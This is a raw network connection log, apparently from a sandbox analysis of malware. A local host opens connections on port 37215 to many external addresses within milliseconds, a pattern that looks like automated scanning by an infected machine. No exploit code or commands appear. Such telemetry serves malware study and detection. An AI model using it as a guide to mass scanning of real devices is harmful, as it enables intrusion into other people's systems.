                                                        Jun 13, 2024 21:31:59.176445007 CEST5015037215192.168.2.1441.146.178.217
                                                        Jun 13, 2024 21:31:59.176476002 CEST4011437215192.168.2.1441.165.223.247
                                                        Jun 13, 2024 21:31:59.176476002 CEST4011437215192.168.2.1441.165.223.247
                                                        Jun 13, 2024 21:31:59.176481009 CEST4037037215192.168.2.1441.165.223.247
                                                        Jun 13, 2024 21:31:59.176532030 CEST5502637215192.168.2.14197.54.176.241
                                                        Jun 13, 2024 21:31:59.176532030 CEST5502637215192.168.2.14197.54.176.241
                                                        Jun 13, 2024 21:31:59.176544905 CEST5528237215192.168.2.14197.54.176.241
                                                        Jun 13, 2024 21:31:59.176562071 CEST5709637215192.168.2.14197.191.97.104
                                                        Jun 13, 2024 21:31:59.176562071 CEST5709637215192.168.2.14197.191.97.104
                                                        Jun 13, 2024 21:31:59.176563978 CEST5735237215192.168.2.14197.191.97.104
                                                        Jun 13, 2024 21:31:59.176589966 CEST4428637215192.168.2.14156.195.196.140
                                                        Jun 13, 2024 21:31:59.176589966 CEST4428637215192.168.2.14156.195.196.140
                                                        Jun 13, 2024 21:31:59.176616907 CEST3696437215192.168.2.1441.39.143.235
                                                        Jun 13, 2024 21:31:59.176616907 CEST3696437215192.168.2.1441.39.143.235
                                                        Jun 13, 2024 21:31:59.176623106 CEST3722037215192.168.2.1441.39.143.235
                                                        Jun 13, 2024 21:31:59.176634073 CEST4454237215192.168.2.14156.195.196.140
                                                        Jun 13, 2024 21:31:59.176641941 CEST4489437215192.168.2.14156.113.19.65
                                                        Jun 13, 2024 21:31:59.176641941 CEST4489437215192.168.2.14156.113.19.65
                                                        Jun 13, 2024 21:31:59.176641941 CEST4515037215192.168.2.14156.113.19.65
                                                        Jun 13, 2024 21:31:59.176655054 CEST5323437215192.168.2.1441.117.38.53
                                                        Jun 13, 2024 21:31:59.176655054 CEST5323437215192.168.2.1441.117.38.53
                                                        Jun 13, 2024 21:31:59.176678896 CEST5874637215192.168.2.14197.66.183.65
                                                        Jun 13, 2024 21:31:59.176678896 CEST5874637215192.168.2.14197.66.183.65
                                                        Jun 13, 2024 21:31:59.176688910 CEST5900237215192.168.2.14197.66.183.65
                                                        Jun 13, 2024 21:31:59.176701069 CEST5349037215192.168.2.1441.117.38.53
                                                        Jun 13, 2024 21:31:59.176712036 CEST3862837215192.168.2.14156.8.66.172
                                                        Jun 13, 2024 21:31:59.176712036 CEST3862837215192.168.2.14156.8.66.172
                                                        Jun 13, 2024 21:31:59.176733017 CEST4523637215192.168.2.14156.64.133.141
                                                        Jun 13, 2024 21:31:59.176733017 CEST4523637215192.168.2.14156.64.133.141
                                                        Jun 13, 2024 21:31:59.176747084 CEST4549237215192.168.2.14156.64.133.141
                                                        Jun 13, 2024 21:31:59.176747084 CEST3888437215192.168.2.14156.8.66.172
                                                        Jun 13, 2024 21:31:59.176755905 CEST3697437215192.168.2.14197.8.169.118
                                                        Jun 13, 2024 21:31:59.176755905 CEST3697437215192.168.2.14197.8.169.118
                                                        Jun 13, 2024 21:31:59.176774025 CEST3723037215192.168.2.14197.8.169.118
                                                        Jun 13, 2024 21:31:59.176781893 CEST5123437215192.168.2.14156.184.148.27
                                                        Jun 13, 2024 21:31:59.176781893 CEST5123437215192.168.2.14156.184.148.27
                                                        Jun 13, 2024 21:31:59.176799059 CEST5149037215192.168.2.14156.184.148.27
                                                        Jun 13, 2024 21:31:59.176815033 CEST3699237215192.168.2.1441.223.100.137
                                                        Jun 13, 2024 21:31:59.176815033 CEST3699237215192.168.2.1441.223.100.137
                                                        Jun 13, 2024 21:31:59.176821947 CEST3724837215192.168.2.1441.223.100.137
                                                        Jun 13, 2024 21:31:59.176841974 CEST3838437215192.168.2.14197.198.78.95
                                                        Jun 13, 2024 21:31:59.176841974 CEST3838437215192.168.2.14197.198.78.95
                                                        Jun 13, 2024 21:31:59.176850080 CEST3864037215192.168.2.14197.198.78.95
                                                        Jun 13, 2024 21:31:59.176867962 CEST6012237215192.168.2.1441.98.185.208
                                                        Jun 13, 2024 21:31:59.176868916 CEST6012237215192.168.2.1441.98.185.208
                                                        Jun 13, 2024 21:31:59.176882029 CEST6037837215192.168.2.1441.98.185.208
                                                        Jun 13, 2024 21:31:59.176892996 CEST5722037215192.168.2.14156.219.224.72
                                                        Jun 13, 2024 21:31:59.176892996 CEST5722037215192.168.2.14156.219.224.72
                                                        Jun 13, 2024 21:31:59.176898003 CEST5747637215192.168.2.14156.219.224.72
                                                        Jun 13, 2024 21:31:59.176913023 CEST5007837215192.168.2.14156.72.43.213
                                                        Jun 13, 2024 21:31:59.176913023 CEST5007837215192.168.2.14156.72.43.213
                                                        Jun 13, 2024 21:31:59.176943064 CEST4349437215192.168.2.14156.66.100.2
                                                        Jun 13, 2024 21:31:59.176943064 CEST4349437215192.168.2.14156.66.100.2
                                                        Jun 13, 2024 21:31:59.176960945 CEST4375037215192.168.2.14156.66.100.2
                                                        Jun 13, 2024 21:31:59.176969051 CEST4368837215192.168.2.1441.84.31.129
                                                        Jun 13, 2024 21:31:59.176978111 CEST5033437215192.168.2.14156.72.43.213
                                                        Jun 13, 2024 21:31:59.176978111 CEST4368837215192.168.2.1441.84.31.129
                                                        Jun 13, 2024 21:31:59.176999092 CEST4394437215192.168.2.1441.84.31.129
                                                        Jun 13, 2024 21:31:59.177011013 CEST5544437215192.168.2.14156.83.50.249
                                                        Jun 13, 2024 21:31:59.177011013 CEST5544437215192.168.2.14156.83.50.249
                                                        Jun 13, 2024 21:31:59.177023888 CEST5570037215192.168.2.14156.83.50.249
                                                        Jun 13, 2024 21:31:59.177027941 CEST5815637215192.168.2.14156.52.58.71
                                                        Jun 13, 2024 21:31:59.177032948 CEST5815637215192.168.2.14156.52.58.71
                                                        Jun 13, 2024 21:31:59.177062988 CEST5841237215192.168.2.14156.52.58.71
                                                        Jun 13, 2024 21:31:59.177062988 CEST3974037215192.168.2.1441.31.170.60
                                                        Jun 13, 2024 21:31:59.177062988 CEST3974037215192.168.2.1441.31.170.60
                                                        Jun 13, 2024 21:31:59.177073956 CEST3999637215192.168.2.1441.31.170.60
                                                        Jun 13, 2024 21:31:59.177090883 CEST5071237215192.168.2.14156.137.82.107
                                                        Jun 13, 2024 21:31:59.177090883 CEST5071237215192.168.2.14156.137.82.107
                                                        Jun 13, 2024 21:31:59.177103043 CEST5096837215192.168.2.14156.137.82.107
                                                        Jun 13, 2024 21:31:59.177114010 CEST3775837215192.168.2.1441.184.239.229
                                                        Jun 13, 2024 21:31:59.177114010 CEST3775837215192.168.2.1441.184.239.229
                                                        Jun 13, 2024 21:31:59.177131891 CEST3801437215192.168.2.1441.184.239.229
                                                        Jun 13, 2024 21:31:59.177154064 CEST5891837215192.168.2.14156.222.68.8
                                                        Jun 13, 2024 21:31:59.177162886 CEST5866237215192.168.2.14156.222.68.8
                                                        Jun 13, 2024 21:31:59.177162886 CEST5866237215192.168.2.14156.222.68.8
                                                        Jun 13, 2024 21:31:59.177190065 CEST3717237215192.168.2.14156.203.240.233
                                                        Jun 13, 2024 21:31:59.177190065 CEST3717237215192.168.2.14156.203.240.233
                                                        Jun 13, 2024 21:31:59.177192926 CEST3476037215192.168.2.14156.252.191.201
                                                        Jun 13, 2024 21:31:59.177213907 CEST3450437215192.168.2.14156.252.191.201
                                                        Jun 13, 2024 21:31:59.177213907 CEST3450437215192.168.2.14156.252.191.201
                                                        Jun 13, 2024 21:31:59.177213907 CEST3742837215192.168.2.14156.203.240.233
                                                        Jun 13, 2024 21:31:59.177213907 CEST5718837215192.168.2.1441.39.234.106
                                                        Jun 13, 2024 21:31:59.177213907 CEST5718837215192.168.2.1441.39.234.106
                                                        Jun 13, 2024 21:31:59.177242041 CEST5744437215192.168.2.1441.39.234.106
                                                        Jun 13, 2024 21:31:59.177267075 CEST4126237215192.168.2.14156.209.60.71
                                                        Jun 13, 2024 21:31:59.177274942 CEST5834637215192.168.2.14156.88.172.221
                                                        Jun 13, 2024 21:31:59.177274942 CEST5834637215192.168.2.14156.88.172.221
                                                        Jun 13, 2024 21:31:59.177289009 CEST5860237215192.168.2.14156.88.172.221
                                                        Jun 13, 2024 21:31:59.177304029 CEST4100637215192.168.2.14156.209.60.71
                                                        Jun 13, 2024 21:31:59.177304983 CEST4679637215192.168.2.1441.134.130.152
                                                        Jun 13, 2024 21:31:59.177304029 CEST4100637215192.168.2.14156.209.60.71
                                                        Jun 13, 2024 21:31:59.177304983 CEST4679637215192.168.2.1441.134.130.152
                                                        Jun 13, 2024 21:31:59.177320957 CEST4705237215192.168.2.1441.134.130.152
                                                        Jun 13, 2024 21:31:59.177335978 CEST5651437215192.168.2.1441.73.140.186
                                                        Jun 13, 2024 21:31:59.177335978 CEST5651437215192.168.2.1441.73.140.186
                                                        Jun 13, 2024 21:31:59.177371025 CEST5677037215192.168.2.1441.73.140.186
                                                        Jun 13, 2024 21:31:59.177373886 CEST6021637215192.168.2.14156.112.130.200
                                                        Jun 13, 2024 21:31:59.177373886 CEST6021637215192.168.2.14156.112.130.200
                                                        Jun 13, 2024 21:31:59.177381992 CEST6047237215192.168.2.14156.112.130.200
                                                        Jun 13, 2024 21:31:59.177397966 CEST5714437215192.168.2.1441.210.189.234
                                                        Jun 13, 2024 21:31:59.177397966 CEST5714437215192.168.2.1441.210.189.234
                                                        Jun 13, 2024 21:31:59.177413940 CEST5740037215192.168.2.1441.210.189.234
                                                        Jun 13, 2024 21:31:59.177429914 CEST3769237215192.168.2.14197.42.1.88
                                                        Jun 13, 2024 21:31:59.177429914 CEST3769237215192.168.2.14197.42.1.88
                                                        Jun 13, 2024 21:31:59.177438021 CEST3794837215192.168.2.14197.42.1.88
                                                        Jun 13, 2024 21:31:59.177457094 CEST3547437215192.168.2.1441.83.124.1
                                                        Jun 13, 2024 21:31:59.177457094 CEST3547437215192.168.2.1441.83.124.1
                                                        Jun 13, 2024 21:31:59.177467108 CEST3573037215192.168.2.1441.83.124.1
                                                        Jun 13, 2024 21:31:59.177481890 CEST4298037215192.168.2.1441.169.161.144
                                                        Jun 13, 2024 21:31:59.177481890 CEST4298037215192.168.2.1441.169.161.144
                                                        Jun 13, 2024 21:31:59.177485943 CEST4323637215192.168.2.1441.169.161.144
                                                        Jun 13, 2024 21:31:59.177495003 CEST4952837215192.168.2.14156.144.57.76
                                                        Jun 13, 2024 21:31:59.177495003 CEST4952837215192.168.2.14156.144.57.76
                                                        Jun 13, 2024 21:31:59.177514076 CEST4978437215192.168.2.14156.144.57.76
                                                        Jun 13, 2024 21:31:59.177532911 CEST3821637215192.168.2.1441.20.0.38
                                                        Jun 13, 2024 21:31:59.177532911 CEST3821637215192.168.2.1441.20.0.38
                                                        Jun 13, 2024 21:31:59.177539110 CEST3847237215192.168.2.1441.20.0.38
                                                        Jun 13, 2024 21:31:59.177545071 CEST4849637215192.168.2.14156.99.248.102
                                                        Jun 13, 2024 21:31:59.177550077 CEST4849637215192.168.2.14156.99.248.102
                                                        Jun 13, 2024 21:31:59.177567005 CEST4875237215192.168.2.14156.99.248.102
                                                        Jun 13, 2024 21:31:59.177577019 CEST5475037215192.168.2.14156.146.188.155
                                                        Jun 13, 2024 21:31:59.177577019 CEST5475037215192.168.2.14156.146.188.155
                                                        Jun 13, 2024 21:31:59.177594900 CEST5500637215192.168.2.14156.146.188.155
                                                        Jun 13, 2024 21:31:59.177608013 CEST5558837215192.168.2.14156.237.117.182
                                                        Jun 13, 2024 21:31:59.177608013 CEST5558837215192.168.2.14156.237.117.182
                                                        Jun 13, 2024 21:31:59.177643061 CEST3818437215192.168.2.14197.145.154.253
                                                        Jun 13, 2024 21:31:59.177643061 CEST3818437215192.168.2.14197.145.154.253
                                                        Jun 13, 2024 21:31:59.177651882 CEST3844037215192.168.2.14197.145.154.253
                                                        Jun 13, 2024 21:31:59.177669048 CEST5584437215192.168.2.14156.237.117.182
                                                        Jun 13, 2024 21:31:59.177678108 CEST3683037215192.168.2.14197.192.218.206
                                                        Jun 13, 2024 21:31:59.177678108 CEST3683037215192.168.2.14197.192.218.206
                                                        Jun 13, 2024 21:31:59.177679062 CEST3708637215192.168.2.14197.192.218.206
                                                        Jun 13, 2024 21:31:59.177695036 CEST5364637215192.168.2.14197.116.183.242
                                                        Jun 13, 2024 21:31:59.177695036 CEST5364637215192.168.2.14197.116.183.242
                                                        Jun 13, 2024 21:31:59.177707911 CEST5390237215192.168.2.14197.116.183.242
                                                        Jun 13, 2024 21:31:59.177707911 CEST4497037215192.168.2.14197.235.39.79
                                                        Jun 13, 2024 21:31:59.177720070 CEST4497037215192.168.2.14197.235.39.79
                                                        Jun 13, 2024 21:31:59.177736998 CEST4522637215192.168.2.14197.235.39.79
                                                        Jun 13, 2024 21:31:59.177752018 CEST3662837215192.168.2.14156.164.61.20
                                                        Jun 13, 2024 21:31:59.177752018 CEST3662837215192.168.2.14156.164.61.20
                                                        Jun 13, 2024 21:31:59.177763939 CEST3688437215192.168.2.14156.164.61.20
                                                        Jun 13, 2024 21:31:59.177800894 CEST4870637215192.168.2.14156.238.222.107
                                                        Jun 13, 2024 21:31:59.177813053 CEST4845037215192.168.2.14156.238.222.107
                                                        Jun 13, 2024 21:31:59.177814007 CEST3408837215192.168.2.14156.165.95.110
                                                        Jun 13, 2024 21:31:59.177813053 CEST4845037215192.168.2.14156.238.222.107
                                                        Jun 13, 2024 21:31:59.177814007 CEST3408837215192.168.2.14156.165.95.110
                                                        Jun 13, 2024 21:31:59.177829981 CEST3434437215192.168.2.14156.165.95.110
                                                        Jun 13, 2024 21:31:59.177850008 CEST5856037215192.168.2.14156.45.190.231
                                                        Jun 13, 2024 21:31:59.177850008 CEST5856037215192.168.2.14156.45.190.231
                                                        Jun 13, 2024 21:31:59.177855968 CEST5881637215192.168.2.14156.45.190.231
                                                        Jun 13, 2024 21:31:59.177865028 CEST3749037215192.168.2.14197.209.154.175
                                                        Jun 13, 2024 21:31:59.177865028 CEST3749037215192.168.2.14197.209.154.175
                                                        Jun 13, 2024 21:31:59.177876949 CEST3774637215192.168.2.14197.209.154.175
                                                        Jun 13, 2024 21:31:59.177886963 CEST5536237215192.168.2.14197.232.150.242
                                                        Jun 13, 2024 21:31:59.177886963 CEST5536237215192.168.2.14197.232.150.242
                                                        Jun 13, 2024 21:31:59.177964926 CEST5561837215192.168.2.14197.232.150.242
                                                        Jun 13, 2024 21:31:59.180083036 CEST372155805641.135.131.164192.168.2.14
                                                        Jun 13, 2024 21:31:59.180138111 CEST372155831241.135.131.164192.168.2.14
                                                        Jun 13, 2024 21:31:59.180150986 CEST372155805641.135.131.164192.168.2.14
                                                        Jun 13, 2024 21:31:59.180162907 CEST372155933841.189.211.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.180185080 CEST5831237215192.168.2.1441.135.131.164
                                                        Jun 13, 2024 21:31:59.180217028 CEST3728437215192.168.2.14156.78.43.67
                                                        Jun 13, 2024 21:31:59.180219889 CEST5831237215192.168.2.1441.135.131.164
                                                        Jun 13, 2024 21:31:59.180238008 CEST372154430241.37.97.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.180363894 CEST372155933841.189.211.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.180769920 CEST372155959441.189.211.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.180783033 CEST372154430241.37.97.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.180794954 CEST3721552230197.208.79.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.180825949 CEST5223037215192.168.2.14197.208.79.238
                                                        Jun 13, 2024 21:31:59.180826902 CEST5959437215192.168.2.1441.189.211.206
                                                        Jun 13, 2024 21:31:59.180850983 CEST3356637215192.168.2.14156.10.114.158
                                                        Jun 13, 2024 21:31:59.180851936 CEST5959437215192.168.2.1441.189.211.206
                                                        Jun 13, 2024 21:31:59.181039095 CEST372154455841.37.97.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.181052923 CEST3721536000156.119.120.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.181065083 CEST3721536256156.119.120.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.181077957 CEST3721552230197.208.79.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.181091070 CEST3721552230197.208.79.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.181092024 CEST4455837215192.168.2.1441.37.97.58
                                                        Jun 13, 2024 21:31:59.181104898 CEST3721552486197.208.79.238192.168.2.14
                                                        Jun 13, 2024 21:31:59.181114912 CEST3625637215192.168.2.14156.119.120.12
                                                        Jun 13, 2024 21:31:59.181114912 CEST4455837215192.168.2.1441.37.97.58
                                                        Jun 13, 2024 21:31:59.181118011 CEST3721540630197.126.143.178192.168.2.14
                                                        Jun 13, 2024 21:31:59.181142092 CEST3721536000156.119.120.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.181144953 CEST5248637215192.168.2.14197.208.79.238
                                                        Jun 13, 2024 21:31:59.181150913 CEST3625637215192.168.2.14156.119.120.12
                                                        Jun 13, 2024 21:31:59.181152105 CEST3600037215192.168.2.14156.119.120.12
                                                        Jun 13, 2024 21:31:59.181152105 CEST5171037215192.168.2.1441.55.60.186
                                                        Jun 13, 2024 21:31:59.181153059 CEST4063037215192.168.2.14197.126.143.178
                                                        Jun 13, 2024 21:31:59.181155920 CEST372153540841.191.223.228192.168.2.14
                                                        Jun 13, 2024 21:31:59.181169033 CEST3721536000156.119.120.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.181169033 CEST5280437215192.168.2.1441.111.224.37
                                                        Jun 13, 2024 21:31:59.181176901 CEST5248637215192.168.2.14197.208.79.238
                                                        Jun 13, 2024 21:31:59.181181908 CEST3721540630197.126.143.178192.168.2.14
                                                        Jun 13, 2024 21:31:59.181183100 CEST3540837215192.168.2.1441.191.223.228
                                                        Jun 13, 2024 21:31:59.181195021 CEST3721540630197.126.143.178192.168.2.14
                                                        Jun 13, 2024 21:31:59.181210041 CEST4938037215192.168.2.1441.72.198.137
                                                        Jun 13, 2024 21:31:59.181225061 CEST372153540841.191.223.228192.168.2.14
                                                        Jun 13, 2024 21:31:59.181236982 CEST372153540841.191.223.228192.168.2.14
                                                        Jun 13, 2024 21:31:59.181248903 CEST3721540886197.126.143.178192.168.2.14
                                                        Jun 13, 2024 21:31:59.181262970 CEST372153566441.191.223.228192.168.2.14
                                                        Jun 13, 2024 21:31:59.181274891 CEST372155504841.128.90.49192.168.2.14
                                                        Jun 13, 2024 21:31:59.181287050 CEST372155504841.128.90.49192.168.2.14
                                                        Jun 13, 2024 21:31:59.181299925 CEST3566437215192.168.2.1441.191.223.228
                                                        Jun 13, 2024 21:31:59.181302071 CEST5504837215192.168.2.1441.128.90.49
                                                        Jun 13, 2024 21:31:59.181302071 CEST4088637215192.168.2.14197.126.143.178
                                                        Jun 13, 2024 21:31:59.181310892 CEST372155504841.128.90.49192.168.2.14
                                                        Jun 13, 2024 21:31:59.181325912 CEST3721534934197.2.27.218192.168.2.14
                                                        Jun 13, 2024 21:31:59.181328058 CEST4088637215192.168.2.14197.126.143.178
                                                        Jun 13, 2024 21:31:59.181338072 CEST3721533698197.111.190.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.181344032 CEST5291237215192.168.2.14156.210.147.248
                                                        Jun 13, 2024 21:31:59.181369066 CEST3493437215192.168.2.14197.2.27.218
                                                        Jun 13, 2024 21:31:59.181374073 CEST3369837215192.168.2.14197.111.190.191
                                                        Jun 13, 2024 21:31:59.181447983 CEST3566437215192.168.2.1441.191.223.228
                                                        Jun 13, 2024 21:31:59.181447983 CEST3311037215192.168.2.1441.112.54.198
                                                        Jun 13, 2024 21:31:59.181792021 CEST372154839841.77.195.149192.168.2.14
                                                        Jun 13, 2024 21:31:59.181806087 CEST3721534934197.2.27.218192.168.2.14
                                                        Jun 13, 2024 21:31:59.181818008 CEST3721534934197.2.27.218192.168.2.14
                                                        Jun 13, 2024 21:31:59.181835890 CEST4839837215192.168.2.1441.77.195.149
                                                        Jun 13, 2024 21:31:59.181843996 CEST372155530441.128.90.49192.168.2.14
                                                        Jun 13, 2024 21:31:59.181857109 CEST3721555162156.17.97.42192.168.2.14
                                                        Jun 13, 2024 21:31:59.181869030 CEST3721535190197.2.27.218192.168.2.14
                                                        Jun 13, 2024 21:31:59.181881905 CEST3721550796156.107.63.120192.168.2.14
                                                        Jun 13, 2024 21:31:59.181893110 CEST5516237215192.168.2.14156.17.97.42
                                                        Jun 13, 2024 21:31:59.181893110 CEST3519037215192.168.2.14197.2.27.218
                                                        Jun 13, 2024 21:31:59.181895018 CEST3721558328197.25.6.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.181899071 CEST5530437215192.168.2.1441.128.90.49
                                                        Jun 13, 2024 21:31:59.181907892 CEST372154839841.77.195.149192.168.2.14
                                                        Jun 13, 2024 21:31:59.181914091 CEST5079637215192.168.2.14156.107.63.120
                                                        Jun 13, 2024 21:31:59.181922913 CEST5530437215192.168.2.1441.128.90.49
                                                        Jun 13, 2024 21:31:59.181937933 CEST5832837215192.168.2.14197.25.6.232
                                                        Jun 13, 2024 21:31:59.181937933 CEST5634037215192.168.2.1441.98.175.117
                                                        Jun 13, 2024 21:31:59.181953907 CEST3519037215192.168.2.14197.2.27.218
                                                        Jun 13, 2024 21:31:59.181962967 CEST372154839841.77.195.149192.168.2.14
                                                        Jun 13, 2024 21:31:59.181965113 CEST5673237215192.168.2.14156.156.109.129
                                                        Jun 13, 2024 21:31:59.181989908 CEST372153644641.53.218.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.182003021 CEST372154865441.77.195.149192.168.2.14
                                                        Jun 13, 2024 21:31:59.182020903 CEST3644637215192.168.2.1441.53.218.229
                                                        Jun 13, 2024 21:31:59.182044983 CEST3721535962156.183.60.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.182050943 CEST4865437215192.168.2.1441.77.195.149
                                                        Jun 13, 2024 21:31:59.182050943 CEST4865437215192.168.2.1441.77.195.149
                                                        Jun 13, 2024 21:31:59.182059050 CEST372155277241.248.134.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.182059050 CEST3769437215192.168.2.14197.15.134.113
                                                        Jun 13, 2024 21:31:59.182071924 CEST3721543492197.48.44.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.182122946 CEST3596237215192.168.2.14156.183.60.101
                                                        Jun 13, 2024 21:31:59.182125092 CEST5277237215192.168.2.1441.248.134.251
                                                        Jun 13, 2024 21:31:59.182125092 CEST4349237215192.168.2.14197.48.44.114
                                                        Jun 13, 2024 21:31:59.182596922 CEST372153457041.62.52.162192.168.2.14
                                                        Jun 13, 2024 21:31:59.182610989 CEST3721533698197.111.190.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.182624102 CEST3721553702197.39.96.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.182631969 CEST3457037215192.168.2.1441.62.52.162
                                                        Jun 13, 2024 21:31:59.182647943 CEST3721533698197.111.190.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.182662964 CEST3721533952197.111.190.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.182665110 CEST5370237215192.168.2.14197.39.96.114
                                                        Jun 13, 2024 21:31:59.182687998 CEST372155206041.22.200.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.182701111 CEST3721555162156.17.97.42192.168.2.14
                                                        Jun 13, 2024 21:31:59.182704926 CEST3395237215192.168.2.14197.111.190.191
                                                        Jun 13, 2024 21:31:59.182714939 CEST3721557092197.59.241.93192.168.2.14
                                                        Jun 13, 2024 21:31:59.182718039 CEST5206037215192.168.2.1441.22.200.117
                                                        Jun 13, 2024 21:31:59.182729006 CEST3721558158156.116.143.128192.168.2.14
                                                        Jun 13, 2024 21:31:59.182737112 CEST3395237215192.168.2.14197.111.190.191
                                                        Jun 13, 2024 21:31:59.182745934 CEST5709237215192.168.2.14197.59.241.93
                                                        Jun 13, 2024 21:31:59.182749987 CEST5977037215192.168.2.14156.30.164.95
                                                        Jun 13, 2024 21:31:59.182765007 CEST5815837215192.168.2.14156.116.143.128
                                                        Jun 13, 2024 21:31:59.182995081 CEST3721555162156.17.97.42192.168.2.14
                                                        Jun 13, 2024 21:31:59.183007956 CEST3721560080197.49.72.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.183021069 CEST3721555414156.17.97.42192.168.2.14
                                                        Jun 13, 2024 21:31:59.183033943 CEST372154752841.116.41.50192.168.2.14
                                                        Jun 13, 2024 21:31:59.183041096 CEST6008037215192.168.2.14197.49.72.102
                                                        Jun 13, 2024 21:31:59.183046103 CEST3721558328197.25.6.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.183063030 CEST4752837215192.168.2.1441.116.41.50
                                                        Jun 13, 2024 21:31:59.183063984 CEST5541437215192.168.2.14156.17.97.42
                                                        Jun 13, 2024 21:31:59.183069944 CEST3721558328197.25.6.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.183090925 CEST5541437215192.168.2.14156.17.97.42
                                                        Jun 13, 2024 21:31:59.183106899 CEST3721558588197.25.6.232192.168.2.14
                                                        Jun 13, 2024 21:31:59.183108091 CEST3974237215192.168.2.1441.32.17.23
                                                        Jun 13, 2024 21:31:59.183120012 CEST372155277241.248.134.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.183132887 CEST3721536048156.126.25.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.183142900 CEST5858837215192.168.2.14197.25.6.232
                                                        Jun 13, 2024 21:31:59.183161020 CEST5858837215192.168.2.14197.25.6.232
                                                        Jun 13, 2024 21:31:59.183161974 CEST3604837215192.168.2.14156.126.25.234
                                                        Jun 13, 2024 21:31:59.183167934 CEST5623437215192.168.2.1441.198.252.189
                                                        Jun 13, 2024 21:31:59.183186054 CEST372155277241.248.134.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.183231115 CEST372155303041.248.134.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.183244944 CEST3721550796156.107.63.120192.168.2.14
                                                        Jun 13, 2024 21:31:59.183257103 CEST3721558710156.199.116.168192.168.2.14
                                                        Jun 13, 2024 21:31:59.183269024 CEST3721550796156.107.63.120192.168.2.14
                                                        Jun 13, 2024 21:31:59.183283091 CEST3721551052156.107.63.120192.168.2.14
                                                        Jun 13, 2024 21:31:59.183289051 CEST5871037215192.168.2.14156.199.116.168
                                                        Jun 13, 2024 21:31:59.183301926 CEST5303037215192.168.2.1441.248.134.251
                                                        Jun 13, 2024 21:31:59.183303118 CEST5303037215192.168.2.1441.248.134.251
                                                        Jun 13, 2024 21:31:59.183315992 CEST5105237215192.168.2.14156.107.63.120
                                                        Jun 13, 2024 21:31:59.183315992 CEST5619437215192.168.2.14156.66.12.61
                                                        Jun 13, 2024 21:31:59.183332920 CEST5105237215192.168.2.14156.107.63.120
                                                        Jun 13, 2024 21:31:59.183363914 CEST5255237215192.168.2.14197.6.83.65
                                                        Jun 13, 2024 21:31:59.183471918 CEST3721535962156.183.60.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.183485985 CEST3721556846156.228.20.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.183516026 CEST5684637215192.168.2.14156.228.20.155
                                                        Jun 13, 2024 21:31:59.183613062 CEST3721535962156.183.60.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.183626890 CEST3721536218156.183.60.101192.168.2.14
                                                        Jun 13, 2024 21:31:59.183674097 CEST3621837215192.168.2.14156.183.60.101
                                                        Jun 13, 2024 21:31:59.183691978 CEST3621837215192.168.2.14156.183.60.101
                                                        Jun 13, 2024 21:31:59.183712006 CEST4121437215192.168.2.14156.87.33.240
                                                        Jun 13, 2024 21:31:59.183758974 CEST372153644641.53.218.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.183773994 CEST372153644641.53.218.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.183788061 CEST372153670241.53.218.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.183800936 CEST372155109241.86.228.153192.168.2.14
                                                        Jun 13, 2024 21:31:59.183813095 CEST3721543492197.48.44.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.183825970 CEST372154734241.152.29.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.183839083 CEST372154515841.128.20.245192.168.2.14
                                                        Jun 13, 2024 21:31:59.183852911 CEST3670237215192.168.2.1441.53.218.229
                                                        Jun 13, 2024 21:31:59.183852911 CEST3670237215192.168.2.1441.53.218.229
                                                        Jun 13, 2024 21:31:59.183862925 CEST4734237215192.168.2.1441.152.29.217
                                                        Jun 13, 2024 21:31:59.183866978 CEST4966637215192.168.2.1441.67.82.18
                                                        Jun 13, 2024 21:31:59.183866978 CEST5109237215192.168.2.1441.86.228.153
                                                        Jun 13, 2024 21:31:59.183871031 CEST4515837215192.168.2.1441.128.20.245
                                                        Jun 13, 2024 21:31:59.183901072 CEST3721543492197.48.44.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.183914900 CEST3721543748197.48.44.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.183927059 CEST372153457041.62.52.162192.168.2.14
                                                        Jun 13, 2024 21:31:59.183939934 CEST372153457041.62.52.162192.168.2.14
                                                        Jun 13, 2024 21:31:59.183952093 CEST4374837215192.168.2.14197.48.44.114
                                                        Jun 13, 2024 21:31:59.183953047 CEST372153482641.62.52.162192.168.2.14
                                                        Jun 13, 2024 21:31:59.183963060 CEST4374837215192.168.2.14197.48.44.114
                                                        Jun 13, 2024 21:31:59.183979988 CEST5386037215192.168.2.1441.38.41.192
                                                        Jun 13, 2024 21:31:59.183983088 CEST3721553702197.39.96.114192.168.2.14
                                                        Jun 13, 2024 21:31:59.183984041 CEST3482637215192.168.2.1441.62.52.162
